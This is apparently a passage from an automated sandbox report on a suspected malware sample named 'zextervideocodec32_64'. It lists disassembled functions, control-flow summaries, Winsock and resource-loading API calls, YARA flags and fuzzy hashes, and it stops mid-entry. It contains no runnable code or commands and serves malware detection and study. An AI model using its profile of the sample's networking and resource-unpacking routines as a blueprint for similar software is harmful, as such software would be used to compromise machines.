1114->1117 1116->1117 1117->1060 1143 2bc48a7-2bc48a9 call 2bc143f 1117->1143 1123 2bc486e 1118->1123 1124 2bc4815-2bc4838 call 2bc8311 1118->1124 1119->1095 1131 2bc4a39-2bc4a5e call 2bca6fb 1119->1131 1123->1114 1133 2bc483d-2bc4841 1124->1133 1132 2bc49ba-2bc49e2 call 2bc3bd3 htonl * 2 call 2bc8387 1127->1132 1128->1132 1131->1095 1144 2bc4a64-2bc4a8d call 2bca6fb 1131->1144 1149 2bc49e7-2bc4a05 htons * 2 1132->1149 1137 2bc486c 1133->1137 1138 2bc4843-2bc4863 call 2bc828b call 2bc84df 1133->1138 1137->1123 1138->1118 1153 2bc4865-2bc486a call 2bc143f 1138->1153 1143->1060 1144->1095 1154 2bc4a93-2bc4b11 call 2bc3863 * 2 call 2bca882 call 2bca921 call 2bc4bad call 2bc3863 * 2 call 2bc44ab 1144->1154 1149->1119 1153->1118 1172 2bc4b16-2bc4b2d call 2bd18d0 1154->1172 1172->1095 1175 2bc4b2f-2bc4b37 call 2bc4100 1172->1175 1175->1095
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC4608
                                                                                                        • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
                                                                                                      • htons.WS2_32(?), ref: 02BC4669
                                                                                                      • htonl.WS2_32(?), ref: 02BC468C
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC4693
                                                                                                      • htons.WS2_32(00000000), ref: 02BC4747
                                                                                                      • _sprintf.LIBCMT ref: 02BC475D
                                                                                                        • Part of subcall function 02BC8962: _memmove.LIBCMT ref: 02BC8982
                                                                                                      • htons.WS2_32(?), ref: 02BC46B0
                                                                                                        • Part of subcall function 02BC970D: __EH_prolog.LIBCMT ref: 02BC9712
                                                                                                        • Part of subcall function 02BC970D: RtlEnterCriticalSection.NTDLL(00000020), ref: 02BC978D
                                                                                                        • Part of subcall function 02BC970D: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02BC97AB
                                                                                                        • Part of subcall function 02BC1BA7: __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                                                        • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                                                        • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                                                        • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                                                        • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                                                        • Part of subcall function 02BCDEC9: __EH_prolog.LIBCMT ref: 02BCDECE
                                                                                                      • htonl.WS2_32(?), ref: 02BC497C
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC4983
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC49C8
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC49CF
                                                                                                      • htons.WS2_32(?), ref: 02BC49EF
                                                                                                      • htons.WS2_32(?), ref: 02BC49F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1645262487-0
                                                                                                      • Opcode ID: 9821fca22ae025abb8c8b6b39ebfce2aaea5fee9f6817cf4306d65c5218e7dbd
                                                                                                      • Instruction ID: 40457734829a43ef054147ef6c9d8122603d812705825655aabbc11b541cb085
                                                                                                      • Opcode Fuzzy Hash: 9821fca22ae025abb8c8b6b39ebfce2aaea5fee9f6817cf4306d65c5218e7dbd
                                                                                                      • Instruction Fuzzy Hash: D2022771D00259EEEF15DFA4D854BEEBBB9AF04304F20419EE545B7280DB746A88CFA1
                                                                                                      Function 02BC4D86 Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1178 2bc4d86-2bc4dcb call 2be53d0 call 2bd0af0 RtlEnterCriticalSection RtlLeaveCriticalSection 1183 2bc50d4-2bc50dd 1178->1183 1184 2bc4dd1 1178->1184 1185 2bc50df call 2bc380b 1183->1185 1186 2bc50e4-2bc50f4 1183->1186 1187 2bc4dd6-2bc4e00 call 2bc3863 call 2bc4bed 1184->1187 1185->1186 1193 2bc4e06-2bc4e0b 1187->1193 1194 2bc50a1-2bc50ad RtlEnterCriticalSection RtlLeaveCriticalSection 1187->1194 1195 2bc506e-2bc5070 1193->1195 1196 2bc4e11-2bc4e3a call 2bcceaf 1193->1196 1197 2bc50b3-2bc50ce RtlEnterCriticalSection RtlLeaveCriticalSection 1194->1197 1195->1194 1199 2bc5072-2bc509f call 2bca6fb 1195->1199 1196->1194 1202 2bc4e40-2bc4e5c call 2bc7cfa 1196->1202 1197->1183 1197->1187 1199->1194 1199->1197 1206 2bc4e5e-2bc4e87 call 2bcceaf 1202->1206 1207 2bc4ec4-2bc4ec8 1202->1207 1208 2bc4e8d-2bc4e99 RtlEnterCriticalSection RtlLeaveCriticalSection 1206->1208 1215 2bc4f98-2bc4fc1 call 2bcceaf 1206->1215 1207->1208 1209 2bc4eca-2bc4eee call 2bcceaf 1207->1209 1213 2bc4e9f-2bc4ea6 RtlEnterCriticalSection RtlLeaveCriticalSection 1208->1213 1214 2bc4ef3-2bc4ef9 1209->1214 1216 2bc4eac-2bc4ebf call 2bc8962 1213->1216 1214->1208 1217 2bc4efb-2bc4f2c call 2bcceaf 1214->1217 1223 2bc5064-2bc5069 1215->1223 1224 2bc4fc7-2bc4ff0 call 2bcceaf 1215->1224 1216->1197 1217->1208 1227 2bc4f32-2bc4f93 call 2bccfe1 call 2bc8962 call 2bc86d7 call 2bc8962 1217->1227 1223->1213 1224->1223 1230 2bc4ff2-2bc5028 call 2bc7cd4 call 2bca988 call 2bcaa60 1224->1230 1227->1215 1242 2bc502d-2bc5050 call 2bc8962 call 2bd18d0 1230->1242 1242->1216 1247 2bc5056-2bc505f call 2bc4100 1242->1247 1247->1216
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC4D8B
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC4DB7
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC4DC3
                                                                                                        • Part of subcall function 02BC4BED: __EH_prolog.LIBCMT ref: 02BC4BF2
                                                                                                        • Part of subcall function 02BC4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02BC4CF2
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC4E93
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC4E99
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC4EA0
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC4EA6
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC50A7
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC50AD
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC50B8
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC50C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                      • String ID:
                                                                                                      • API String ID: 2062355503-0
                                                                                                      • Opcode ID: b0d424a15e6128ee852868994266b1693fd613e0b81c841ce024ab2c6e6ab1bb
                                                                                                      • Instruction ID: d5c810beec607ea3b721c4ced4d98a20e7af8d164ce68c2443ac58a77e4cca52
                                                                                                      • Opcode Fuzzy Hash: b0d424a15e6128ee852868994266b1693fd613e0b81c841ce024ab2c6e6ab1bb
                                                                                                      • Instruction Fuzzy Hash: 63B12971D0025EDEEF25DF94C844BEEBBB5AF04314F20409EE509B6181DBB46A89CFA1
                                                                                                      Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1276 401f64-401f84 FindResourceA 1277 401f86-401f9d GetLastError SizeofResource 1276->1277 1278 401f9f-401fa1 1276->1278 1277->1278 1279 401fa6-401fec LoadResource LockResource GlobalAlloc call 402900 * 2 1277->1279 1280 402096-40209a 1278->1280 1285 401fee-401ff9 1279->1285 1285->1285 1286 401ffb-402003 GetTickCount 1285->1286 1287 402032-402038 1286->1287 1288 402005-402007 1286->1288 1289 402053-402083 GlobalAlloc call 401c26 1287->1289 1290 40203a-40204a 1287->1290 1288->1289 1291 402009-40200f 1288->1291 1296 402088-402093 1289->1296 1292 40204c 1290->1292 1293 40204e-402051 1290->1293 1291->1289 1295 402011-402023 1291->1295 1292->1293 1293->1289 1293->1290 1297 402025 1295->1297 1298 402027-40202a 1295->1298 1296->1280 1297->1298 1298->1295 1299 40202c-40202e 1298->1299 1299->1291 1300 402030 1299->1300 1300->1289
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                                      • GetLastError.KERNEL32 ref: 00401F86
                                                                                                      • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                      • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                                      • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                      • String ID:
                                                                                                      • API String ID: 564119183-0
                                                                                                      • Opcode ID: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                                      • Instruction ID: 5f40b5bb2c798fd06435bc38b1d437300a77b6e6fc54339f6675bf13ecd45336
                                                                                                      • Opcode Fuzzy Hash: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                                      • Instruction Fuzzy Hash: 45314E71A00255AFDB105FB59F8896F7F68EF45344F10807AFE86F7281DA748845C7A8
                                                                                                      Function 02BC26DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1301 2bc26db-2bc2726 RtlEnterCriticalSection 1302 2bc277e-2bc2781 1301->1302 1303 2bc2728-2bc2736 CreateWaitableTimerA 1301->1303 1306 2bc27d5-2bc27f0 RtlLeaveCriticalSection 1302->1306 1307 2bc2783-2bc2798 call 2bd3b2c 1302->1307 1304 2bc2738-2bc2756 GetLastError call 2bd0af0 call 2bc1712 1303->1304 1305 2bc275b-2bc2778 SetWaitableTimer 1303->1305 1304->1305 1305->1302 1313 2bc27ca 1307->1313 1314 2bc279a-2bc27ac call 2bd3b2c 1307->1314 1315 2bc27cc-2bc27d0 call 2bc7dd9 1313->1315 1319 2bc27ae-2bc27b7 1314->1319 1320 2bc27b9 1314->1320 1315->1306 1321 2bc27bb-2bc27c3 call 2bc1cf8 1319->1321 1320->1321 1323 2bc27c8 1321->1323 1323->1315
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BC2706
                                                                                                      • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02BC272B
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BE5B33), ref: 02BC2738
                                                                                                        • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                                                      • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02BC2778
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC27D9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                      • String ID: timer
                                                                                                      • API String ID: 4293676635-1792073242
                                                                                                      • Opcode ID: 165d300a08d888fc2e8c500b3e049f5dd6f766e7106725eacd0e3fc61299d38b
                                                                                                      • Instruction ID: b03259388e62484b24fdd58975106fad66ebb921368cdceab8886a03e1199f26
                                                                                                      • Opcode Fuzzy Hash: 165d300a08d888fc2e8c500b3e049f5dd6f766e7106725eacd0e3fc61299d38b
                                                                                                      • Instruction Fuzzy Hash: EB31C0B1804701EFD710DF25C984B66BBE8FB48764F104AAEF85587681DB70E810CF91
                                                                                                      Function 02BC2B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1352 2bc2b95-2bc2baf 1353 2bc2bc7-2bc2bcb 1352->1353 1354 2bc2bb1-2bc2bb9 call 2bd0af0 1352->1354 1355 2bc2bcd-2bc2bd0 1353->1355 1356 2bc2bdf 1353->1356 1361 2bc2bbf-2bc2bc2 1354->1361 1355->1356 1358 2bc2bd2-2bc2bdd call 2bd0af0 1355->1358 1359 2bc2be2-2bc2c11 WSASetLastError WSARecv call 2bca4df 1356->1359 1358->1361 1366 2bc2c16-2bc2c1d 1359->1366 1364 2bc2d30 1361->1364 1367 2bc2d32-2bc2d38 1364->1367 1368 2bc2c2c-2bc2c32 1366->1368 1369 2bc2c1f-2bc2c2a call 2bd0af0 1366->1369 1371 2bc2c34-2bc2c39 call 2bd0af0 1368->1371 1372 2bc2c46-2bc2c48 1368->1372 1380 2bc2c3f-2bc2c42 1369->1380 1371->1380 1373 2bc2c4f-2bc2c60 call 2bd0af0 1372->1373 1374 2bc2c4a-2bc2c4d 1372->1374 1373->1367 1378 2bc2c66-2bc2c69 1373->1378 1374->1378 1382 2bc2c6b-2bc2c6d 1378->1382 1383 2bc2c73-2bc2c76 1378->1383 1380->1372 1382->1383 1384 2bc2d22-2bc2d2d call 2bc1996 1382->1384 1383->1364 1385 2bc2c7c-2bc2c9a call 2bd0af0 call 2bc166f 1383->1385 1384->1364 1392 2bc2cbc-2bc2cfa WSASetLastError select call 2bca4df 1385->1392 1393 2bc2c9c-2bc2cba call 2bd0af0 call 2bc166f 1385->1393 1399 2bc2cfc-2bc2d06 call 2bd0af0 1392->1399 1400 2bc2d08 1392->1400 1393->1364 1393->1392 1407 2bc2d19-2bc2d1d 1399->1407 1403 2bc2d0a-2bc2d12 call 2bd0af0 1400->1403 1404 2bc2d15-2bc2d17 1400->1404 1403->1404 1404->1364 1404->1407 1407->1359
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2BE4
                                                                                                      • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02BC2C07
                                                                                                        • Part of subcall function 02BCA4DF: WSAGetLastError.WS2_32(00000000,?,?,02BC2A51), ref: 02BCA4ED
                                                                                                      • WSASetLastError.WS2_32 ref: 02BC2CD3
                                                                                                      • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02BC2CE7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Recvselect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 886190287-280543908
                                                                                                      • Opcode ID: 408767b6a9fa507bdc69f3aeb2eb48ff8d66c850199e036b7aff87966fe57b18
                                                                                                      • Instruction ID: bf6c44591a77c15af4ffebec0108feece1d36b117e41a61145883935642151c2
                                                                                                      • Opcode Fuzzy Hash: 408767b6a9fa507bdc69f3aeb2eb48ff8d66c850199e036b7aff87966fe57b18
                                                                                                      • Instruction Fuzzy Hash: 7A414CB19153019FDB20AF64C5447ABBBE9EF94364F200D9EE99987280EBB4D540CB92
                                                                                                      Function 00402EB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32 ref: 00402ED6
                                                                                                        • Part of subcall function 00403FF4: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                                                                        • Part of subcall function 00403FF4: HeapDestroy.KERNEL32 ref: 00404044
                                                                                                      • GetCommandLineA.KERNEL32 ref: 00402F24
                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00402F4F
                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402F72
                                                                                                        • Part of subcall function 00402FCB: ExitProcess.KERNEL32 ref: 00402FE8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                      • String ID: Y
                                                                                                      • API String ID: 2057626494-4136946213
                                                                                                      • Opcode ID: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                                                                      • Instruction ID: ae24bdd31f92ba5c0019e7eb98566f973638ce5b9b082510a96f2684413349a7
                                                                                                      • Opcode Fuzzy Hash: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                                                                      • Instruction Fuzzy Hash: 3721A1B1840615ABDB14AFA6DE4AA6E7FB8EF44705F10413FF501B72D1DB384500CB58
                                                                                                      Function 02BC29EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2A3B
                                                                                                      • closesocket.WS2_32 ref: 02BC2A42
                                                                                                      • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02BC2A89
                                                                                                      • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02BC2A97
                                                                                                      • closesocket.WS2_32 ref: 02BC2A9E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                                      • String ID:
                                                                                                      • API String ID: 1561005644-0
                                                                                                      • Opcode ID: 8ab73392da109a8a76ce5b973068fb15b9e12a3cd98529d7b9e5cab6b49e8961
                                                                                                      • Instruction ID: f3e3511a0ac6ef53713a1d83664e13d45fea8f5a4b6169f68b2311cc1f3118b0
                                                                                                      • Opcode Fuzzy Hash: 8ab73392da109a8a76ce5b973068fb15b9e12a3cd98529d7b9e5cab6b49e8961
                                                                                                      • Instruction Fuzzy Hash: 6421D675E00215EBEB20ABB8D844B6EB7E9DF48315F2449EDFD65C7240EB70C9418B61
                                                                                                      Function 02BC1BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 1633115879-0
                                                                                                      • Opcode ID: 37de1c3da8be93f749d4621cef1e6ad0e514ae15d7e26f58aad92da245220131
                                                                                                      • Instruction ID: 1f29817c0bb33c67ad60c04e07f84fb440ce9dc58c5d4a0585f46f23ae6a4cde
                                                                                                      • Opcode Fuzzy Hash: 37de1c3da8be93f749d4621cef1e6ad0e514ae15d7e26f58aad92da245220131
                                                                                                      • Instruction Fuzzy Hash: BE218D75910204DFDB14CF68C44479ABBB5FF48714F20858DE859AB302DB74E905CBE0
                                                                                                      Function 0040279F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 12timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCommandLineW.KERNEL32 ref: 0040279F
                                                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 00402895
                                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D9FE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CommandLine$ArgvLocalTime
                                                                                                      • String ID: XiM#
                                                                                                      • API String ID: 3768950922-2404075716
                                                                                                      • Opcode ID: b9f1d27c841553a6286a37432cf0b285126cb2c39f5f0c794a39fb817397f4e9
                                                                                                      • Instruction ID: de3cc8fe9ec75cbd48575bc385f6373e9aba7dd0c2470f36669371c28cae3d1f
                                                                                                      • Opcode Fuzzy Hash: b9f1d27c841553a6286a37432cf0b285126cb2c39f5f0c794a39fb817397f4e9
                                                                                                      • Instruction Fuzzy Hash: 5ED09271805102EFC3042BE09F0812936A4AA093453610A3EE243B51E0CB78104EAB2E
                                                                                                      Function 02BC2EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2EEE
                                                                                                      • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02BC2EFD
                                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02BC2F0C
                                                                                                      • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02BC2F36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Socketsetsockopt
                                                                                                      • String ID:
                                                                                                      • API String ID: 2093263913-0
                                                                                                      • Opcode ID: 72d1f20c8cdfe9ddf03d4987885d4f76e7bd94ebf419b3350616b0d269a42857
                                                                                                      • Instruction ID: 9e6e4ba00f7c1940fcb403d938ab291309852510814267ad601b12a838b29093
                                                                                                      • Opcode Fuzzy Hash: 72d1f20c8cdfe9ddf03d4987885d4f76e7bd94ebf419b3350616b0d269a42857
                                                                                                      • Instruction Fuzzy Hash: 08018D71941214FBDF205F65DC88F9ABBA9EF85761F008559F918CF141D77088008B70
                                                                                                      Function 02BC2DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BC2D39: WSASetLastError.WS2_32(00000000), ref: 02BC2D47
                                                                                                        • Part of subcall function 02BC2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02BC2D5C
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2E6D
                                                                                                      • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02BC2E83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Sendselect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 2958345159-280543908
                                                                                                      • Opcode ID: 10024330f6159e5e70c869a6398d9c5ed2e09ee6c444b05de78f9bdaf6f3e110
                                                                                                      • Instruction ID: 011b3da6e698b48dd16aa4db3934a4cb44b613b151dd3e3739bf2d63bf873ae8
                                                                                                      • Opcode Fuzzy Hash: 10024330f6159e5e70c869a6398d9c5ed2e09ee6c444b05de78f9bdaf6f3e110
                                                                                                      • Instruction Fuzzy Hash: F431BEB0E012199FDF10EF64D804BEE7BAAEF05354F2045DEED1597240EBB095518FA0
                                                                                                      Function 02BC963F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02BC83A9,?,?,00000000), ref: 02BC96A6
                                                                                                      • getsockname.WS2_32(?,?,?), ref: 02BC96BC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastgetsockname
                                                                                                      • String ID: &'
                                                                                                      • API String ID: 566540725-655172784
                                                                                                      • Opcode ID: 8b57f92c9610429ac1667ef64065bebefa61d1eb98d7a9586c3230f27021affe
                                                                                                      • Instruction ID: 8d803af34d914abb531221d2e78de1d6b53f286731516c1933a273bbf1ba9a36
                                                                                                      • Opcode Fuzzy Hash: 8b57f92c9610429ac1667ef64065bebefa61d1eb98d7a9586c3230f27021affe
                                                                                                      • Instruction Fuzzy Hash: E0216571A01248DBDB10EF68D844ADEBBF5FF4C314F21856AE919EB280EB34E9458B50
                                                                                                      Function 02BC2AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2AEA
                                                                                                      • connect.WS2_32(?,?,?), ref: 02BC2AF5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastconnect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 374722065-280543908
                                                                                                      • Opcode ID: 2769607d8c369f2e623bd2ec4ff51e74da7c3ecd7a49713c99612e9cec00e6fa
